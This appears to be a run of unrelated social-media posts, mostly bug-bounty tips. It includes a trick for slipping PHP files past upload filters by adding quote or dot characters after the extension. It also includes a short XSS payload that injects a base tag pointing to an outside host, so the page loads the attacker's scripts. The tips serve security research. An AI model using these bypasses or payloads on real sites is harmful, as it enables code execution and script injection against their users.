Probably nothing... I just applied to Alchemy University (@AlchemyLearn) to earn my free web3 degree!
Applications are open to everyone! LFG!!! https://t.co/dfgw4wGRQv
Want to bypass file upload restrictions?
Add ' , . " after the file extension just like:
file.php' , file.php. , file.php" worked on many targets.
#BugBounty#bugbountytips
Took more than 2 years, but just released the postMessage-tracker Chrome Extension!
https://t.co/l1HMf1vL0Q
Look at the functions receiving postMessages directly in the extension, look at the messages and sender/receiver window locations and track everything using a log-URL.
20-char #XSS
<Base Href=//X55.is>
It uses relative path to work so there should such call after injection point like <script src="/path/file.js">.
Inform your custom JS code like alert(document.domain) after fragment (#) of URL if needed.
Useful against some poor CSP too.
Bismillah.
A simple write-up about how I found privilege escalation issue.
"Simple Vertical Privilege Escalation by Changing HTTP Response"
https://t.co/8xNz4V9hgB
Note: not much new things. Just using lots of published tips and tricks.
I was very inconsistent about what should I do when hunting on a program, To make things systematic , I made the list of tasks, Happy to share it with Infosec community. If you have any suggestions modifying this list, You're most welcome. Hope it helps
#bugbounty#bugbountytips